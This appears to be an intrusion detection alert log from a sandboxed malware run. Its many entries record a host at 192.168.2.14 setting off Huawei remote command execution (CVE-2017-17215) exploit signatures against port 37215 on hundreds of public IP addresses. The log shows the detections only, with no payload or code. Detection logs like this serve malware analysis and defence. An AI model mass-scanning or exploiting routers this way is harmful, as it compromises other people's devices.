                                                    07/10/24-08:27:27.159132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193837215192.168.2.14213.175.147.99
                                                    07/10/24-08:26:14.771626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572637215192.168.2.14157.94.20.208
                                                    07/10/24-08:27:05.182068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4386037215192.168.2.14197.160.207.178
                                                    07/10/24-08:26:26.531286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118037215192.168.2.14205.51.171.42
                                                    07/10/24-08:27:33.772276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951837215192.168.2.14126.32.157.155
                                                    07/10/24-08:26:14.819736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147637215192.168.2.1412.149.8.18
                                                    07/10/24-08:26:55.312291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532237215192.168.2.1414.74.189.103
                                                    07/10/24-08:27:02.985311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011037215192.168.2.14197.253.100.225
                                                    07/10/24-08:27:14.803145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262437215192.168.2.14197.150.33.248
                                                    07/10/24-08:26:11.557054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105037215192.168.2.14157.27.108.34
                                                    07/10/24-08:26:41.524750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250037215192.168.2.14157.233.223.214
                                                    07/10/24-08:26:41.617350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601237215192.168.2.14197.247.235.90
                                                    07/10/24-08:26:33.166033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257037215192.168.2.14157.187.221.205
                                                    07/10/24-08:26:53.155624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783837215192.168.2.14123.136.102.240
                                                    07/10/24-08:27:17.070374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338637215192.168.2.1441.218.50.148
                                                    07/10/24-08:26:20.150804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461837215192.168.2.1414.34.68.118
                                                    07/10/24-08:26:51.939939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880837215192.168.2.14157.249.53.64
                                                    07/10/24-08:27:14.003355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368437215192.168.2.14197.72.85.165
                                                    07/10/24-08:26:43.524058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823037215192.168.2.1441.132.62.143
                                                    07/10/24-08:26:23.343986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651437215192.168.2.14157.177.245.153
                                                    07/10/24-08:27:30.433445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936837215192.168.2.14157.26.252.124
                                                    07/10/24-08:26:29.858032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698437215192.168.2.1441.8.184.24
                                                    07/10/24-08:26:15.838887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045637215192.168.2.14197.163.83.253
                                                    07/10/24-08:26:23.324880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438437215192.168.2.1441.103.47.228
                                                    07/10/24-08:26:18.019424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3917437215192.168.2.1425.136.100.142
                                                    07/10/24-08:27:13.868751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077237215192.168.2.14157.52.97.115
                                                    07/10/24-08:26:11.537516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4771837215192.168.2.14197.207.251.197
                                                    07/10/24-08:26:11.616592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854637215192.168.2.1441.251.90.178
                                                    07/10/24-08:27:10.589901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715037215192.168.2.14143.210.241.152
                                                    07/10/24-08:27:27.147329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013037215192.168.2.14157.121.126.242
                                                    07/10/24-08:27:13.800580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687437215192.168.2.1441.41.185.74
                                                    07/10/24-08:26:23.320743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363037215192.168.2.14197.45.12.6
                                                    07/10/24-08:27:05.140242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5119037215192.168.2.14197.119.81.186
                                                    07/10/24-08:27:27.133887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517037215192.168.2.14157.84.208.119
                                                    07/10/24-08:26:28.787394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5762837215192.168.2.14197.61.116.249
                                                    07/10/24-08:27:02.876445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861237215192.168.2.14157.157.33.203
                                                    07/10/24-08:26:28.873311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090837215192.168.2.14157.167.169.189
                                                    07/10/24-08:27:02.980089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.1441.145.117.121
                                                    07/10/24-08:27:31.448352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4224237215192.168.2.14102.72.6.225
                                                    07/10/24-08:27:13.866267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5049237215192.168.2.14157.43.62.221
                                                    07/10/24-08:27:30.472766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098437215192.168.2.14170.12.20.63
                                                    07/10/24-08:27:05.189458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901037215192.168.2.149.202.64.40
                                                    07/10/24-08:26:36.414477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3540237215192.168.2.1441.250.30.52
                                                    07/10/24-08:26:31.076379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697037215192.168.2.1441.112.110.98
                                                    07/10/24-08:27:14.835457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068237215192.168.2.14157.144.194.184
                                                    07/10/24-08:27:22.929262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498237215192.168.2.14197.158.181.235
                                                    07/10/24-08:27:05.212811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304637215192.168.2.14157.207.104.235
                                                    07/10/24-08:26:57.610016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230437215192.168.2.14132.30.171.167
                                                    07/10/24-08:26:59.534289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957237215192.168.2.14157.189.137.172
                                                    07/10/24-08:26:49.831923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422037215192.168.2.1441.1.106.1
                                                    07/10/24-08:27:33.872945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646237215192.168.2.14157.110.133.42
                                                    07/10/24-08:27:11.533117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301637215192.168.2.14157.74.82.10
                                                    07/10/24-08:27:14.860796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615037215192.168.2.14137.240.129.16
                                                    07/10/24-08:26:34.200878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859037215192.168.2.1441.157.136.151
                                                    07/10/24-08:26:47.992323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5407837215192.168.2.14197.76.69.23
                                                    07/10/24-08:27:23.504767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465837215192.168.2.1441.14.249.85
                                                    07/10/24-08:27:02.811606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270837215192.168.2.1441.239.129.129
                                                    07/10/24-08:26:59.586779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469437215192.168.2.1441.12.14.29
                                                    07/10/24-08:26:43.861688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186437215192.168.2.14197.41.158.175
                                                    07/10/24-08:27:13.996169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828837215192.168.2.14197.62.154.35
                                                    07/10/24-08:27:31.486586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417437215192.168.2.1420.127.132.83
                                                    07/10/24-08:26:57.513977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553837215192.168.2.14197.96.169.159
                                                    07/10/24-08:26:59.526504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152637215192.168.2.14157.167.117.130
                                                    07/10/24-08:27:27.053819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600237215192.168.2.14148.130.98.72
                                                    07/10/24-08:26:28.768053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939037215192.168.2.14157.159.101.151
                                                    07/10/24-08:27:03.034079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963637215192.168.2.14197.19.44.211
                                                    07/10/24-08:26:28.929759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5321437215192.168.2.1441.242.62.222
                                                    07/10/24-08:27:07.268531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789037215192.168.2.14208.173.240.6
                                                    07/10/24-08:26:22.280856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4533237215192.168.2.1475.147.138.53
                                                    07/10/24-08:26:49.830587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492237215192.168.2.141.221.147.100
                                                    07/10/24-08:26:48.005351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262437215192.168.2.1441.234.13.228
                                                    07/10/24-08:26:43.527873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832437215192.168.2.14197.249.115.174
                                                    07/10/24-08:26:22.286064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981237215192.168.2.14197.249.67.218
                                                    07/10/24-08:27:05.200301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116637215192.168.2.1441.222.17.188
                                                    07/10/24-08:26:13.790493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383837215192.168.2.1441.58.113.10
                                                    07/10/24-08:26:14.824394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480637215192.168.2.1441.144.79.34
                                                    07/10/24-08:26:38.590272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523837215192.168.2.1441.168.131.180
                                                    07/10/24-08:27:24.921580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5070637215192.168.2.14197.11.38.150
                                                    07/10/24-08:26:43.901801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039037215192.168.2.1441.177.46.175
                                                    07/10/24-08:27:24.920264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3673037215192.168.2.1468.246.28.230
                                                    07/10/24-08:26:34.234133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712837215192.168.2.142.226.60.8
                                                    07/10/24-08:27:02.770839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934437215192.168.2.14197.133.27.61
                                                    07/10/24-08:27:30.561465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658237215192.168.2.14157.237.49.144
                                                    07/10/24-08:26:53.145999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665437215192.168.2.1441.232.149.33
                                                    07/10/24-08:26:59.867670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020837215192.168.2.149.79.232.97
                                                    07/10/24-08:26:11.571607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662637215192.168.2.14197.53.195.234
                                                    07/10/24-08:26:49.828950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674237215192.168.2.14197.20.253.96
                                                    07/10/24-08:27:05.165980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275637215192.168.2.1447.198.146.100
                                                    07/10/24-08:26:25.514524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785037215192.168.2.14197.11.191.242
                                                    07/10/24-08:27:19.253247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889837215192.168.2.14197.16.95.207
                                                    07/10/24-08:26:57.498447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3685637215192.168.2.14157.15.125.159
                                                    07/10/24-08:26:57.628977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939637215192.168.2.1441.19.158.94
                                                    07/10/24-08:26:55.278007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059037215192.168.2.14197.68.129.195
                                                    07/10/24-08:26:13.830274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901037215192.168.2.1481.248.239.7
                                                    07/10/24-08:27:28.139663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867237215192.168.2.1441.89.177.56
                                                    07/10/24-08:26:49.911247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650837215192.168.2.1441.208.64.80
                                                    07/10/24-08:26:49.824367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4592637215192.168.2.14116.50.78.23
                                                    07/10/24-08:26:25.522159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3357637215192.168.2.1441.116.53.2
                                                    07/10/24-08:26:15.820169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818237215192.168.2.1485.206.210.165
                                                    07/10/24-08:26:25.515486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540237215192.168.2.14172.141.197.65
                                                    07/10/24-08:26:31.098099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963237215192.168.2.14197.3.38.111
                                                    07/10/24-08:26:43.702243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015237215192.168.2.14169.190.237.31
                                                    07/10/24-08:26:43.772069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5173037215192.168.2.14105.173.218.209
                                                    07/10/24-08:26:15.869114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768637215192.168.2.1462.156.25.255
                                                    07/10/24-08:26:25.441344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999837215192.168.2.14157.123.197.243
                                                    07/10/24-08:26:51.932459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921437215192.168.2.14157.144.232.135
                                                    07/10/24-08:26:51.997366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077837215192.168.2.14222.210.16.81
                                                    07/10/24-08:27:22.933807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208237215192.168.2.14197.198.236.79
                                                    07/10/24-08:26:43.872861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056437215192.168.2.1463.128.24.198
                                                    07/10/24-08:27:23.915755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4047237215192.168.2.14197.183.105.200
                                                    07/10/24-08:26:11.558089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628037215192.168.2.14157.204.246.144
                                                    07/10/24-08:26:55.412388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741837215192.168.2.1441.129.112.147
                                                    07/10/24-08:27:33.759873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882037215192.168.2.1441.68.176.190
                                                    07/10/24-08:26:45.591326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616237215192.168.2.1462.39.102.200
                                                    07/10/24-08:27:08.419157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796237215192.168.2.14157.46.241.188
                                                    07/10/24-08:27:23.942698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887837215192.168.2.14197.128.179.35
                                                    07/10/24-08:27:33.868088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962037215192.168.2.14134.214.153.75
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490437215192.168.2.14157.106.116.220
                                                    07/10/24-08:26:20.175593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869237215192.168.2.14197.56.148.116
                                                    07/10/24-08:27:23.959862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599437215192.168.2.14197.243.19.5
                                                    07/10/24-08:27:10.609490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984037215192.168.2.14157.53.118.157
                                                    07/10/24-08:26:23.348591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554037215192.168.2.14155.155.116.122
                                                    07/10/24-08:26:36.397688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016637215192.168.2.1441.34.178.20
                                                    07/10/24-08:26:23.305980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515837215192.168.2.1472.224.7.27
                                                    07/10/24-08:27:33.778513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584837215192.168.2.14204.6.73.56
                                                    07/10/24-08:27:07.369689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964637215192.168.2.14150.118.243.115
                                                    07/10/24-08:27:20.439109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991837215192.168.2.14197.21.62.124
                                                    07/10/24-08:26:52.050918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552637215192.168.2.14197.25.160.10
                                                    07/10/24-08:26:55.436207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664437215192.168.2.1441.67.187.34
                                                    07/10/24-08:26:38.619683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.14101.22.73.63
                                                    07/10/24-08:27:30.542155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260637215192.168.2.14157.231.223.195
                                                    07/10/24-08:26:55.429801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5118437215192.168.2.14197.129.194.172
                                                    07/10/24-08:26:57.566526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601437215192.168.2.14157.202.119.185
                                                    07/10/24-08:27:27.139114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4064037215192.168.2.14197.188.40.23
                                                    07/10/24-08:27:32.532226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343037215192.168.2.1441.49.21.51
                                                    07/10/24-08:27:19.329520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3420837215192.168.2.14157.118.174.2
                                                    07/10/24-08:26:22.273288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798837215192.168.2.1441.100.59.110
                                                    07/10/24-08:26:38.648004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606437215192.168.2.1441.219.177.134
                                                    07/10/24-08:26:28.639081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505837215192.168.2.14157.13.202.202
                                                    07/10/24-08:27:07.333954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984237215192.168.2.14139.80.145.175
                                                    07/10/24-08:27:19.170631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314837215192.168.2.14220.186.44.88
                                                    07/10/24-08:26:38.624232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435237215192.168.2.1441.157.76.103
                                                    07/10/24-08:26:41.483728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009037215192.168.2.14197.24.79.180
                                                    07/10/24-08:26:28.876491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896037215192.168.2.14157.127.214.151
                                                    07/10/24-08:26:55.433645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842037215192.168.2.14197.237.94.28
                                                    07/10/24-08:26:42.383706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531637215192.168.2.1488.234.61.206
                                                    07/10/24-08:26:15.879518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932037215192.168.2.14157.98.235.216
                                                    07/10/24-08:26:53.180230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182237215192.168.2.14157.236.63.237
                                                    07/10/24-08:27:19.330211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925837215192.168.2.14157.65.135.131
                                                    07/10/24-08:26:20.130042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710637215192.168.2.14197.55.177.190
                                                    07/10/24-08:26:45.576227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615637215192.168.2.14157.215.53.166
                                                    07/10/24-08:27:05.189899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188437215192.168.2.14197.111.35.58
                                                    07/10/24-08:27:07.397388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511237215192.168.2.1441.129.215.7
                                                    07/10/24-08:26:53.163403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222037215192.168.2.1474.15.86.66
                                                    07/10/24-08:27:28.144364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5261837215192.168.2.14157.87.81.148
                                                    07/10/24-08:27:28.134623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866837215192.168.2.14197.254.103.42
                                                    07/10/24-08:27:23.953541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457237215192.168.2.14197.3.76.53
                                                    07/10/24-08:26:38.618161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488037215192.168.2.1443.158.37.144
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569437215192.168.2.14197.176.1.105
                                                    07/10/24-08:26:31.058453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065237215192.168.2.14197.132.38.9
                                                    07/10/24-08:26:33.171113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5541237215192.168.2.14197.147.85.95
                                                    07/10/24-08:26:13.816955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805837215192.168.2.1441.178.8.111
                                                    07/10/24-08:27:14.865429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149437215192.168.2.1441.84.2.198
                                                    07/10/24-08:27:22.838932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885037215192.168.2.1432.139.211.9
                                                    07/10/24-08:27:20.451550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520237215192.168.2.14197.210.73.68
                                                    07/10/24-08:26:47.908603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087237215192.168.2.1441.199.116.51
                                                    07/10/24-08:27:13.883057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450637215192.168.2.14197.18.76.176
                                                    07/10/24-08:27:22.890637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251837215192.168.2.1475.67.208.160
                                                    07/10/24-08:26:14.804457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545437215192.168.2.14166.242.146.25
                                                    07/10/24-08:26:17.937517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806437215192.168.2.14157.48.7.155
                                                    07/10/24-08:27:30.541928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470637215192.168.2.14157.182.121.205
                                                    07/10/24-08:27:02.702659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219037215192.168.2.1423.236.187.217
                                                    07/10/24-08:27:24.981479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782837215192.168.2.14197.86.245.45
                                                    07/10/24-08:27:20.498164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782237215192.168.2.14149.160.27.225
                                                    07/10/24-08:26:28.859810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552037215192.168.2.1496.25.212.247
                                                    07/10/24-08:27:22.838932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648237215192.168.2.14176.131.231.150
                                                    07/10/24-08:27:02.974934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519237215192.168.2.14157.184.65.241
                                                    07/10/24-08:26:29.755457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5447837215192.168.2.14197.117.31.156
                                                    07/10/24-08:27:19.191289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866037215192.168.2.14157.87.149.87
                                                    07/10/24-08:26:57.536379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606237215192.168.2.14157.89.126.153
                                                    07/10/24-08:26:55.412009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940437215192.168.2.14197.214.112.190
                                                    07/10/24-08:26:43.718620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263437215192.168.2.14197.138.19.0
                                                    07/10/24-08:27:08.437142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999837215192.168.2.14197.30.34.112
                                                    07/10/24-08:26:31.091003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195637215192.168.2.14197.71.30.221
                                                    07/10/24-08:26:42.441325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041637215192.168.2.14157.152.61.49
                                                    07/10/24-08:27:14.834981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079837215192.168.2.14157.151.229.62
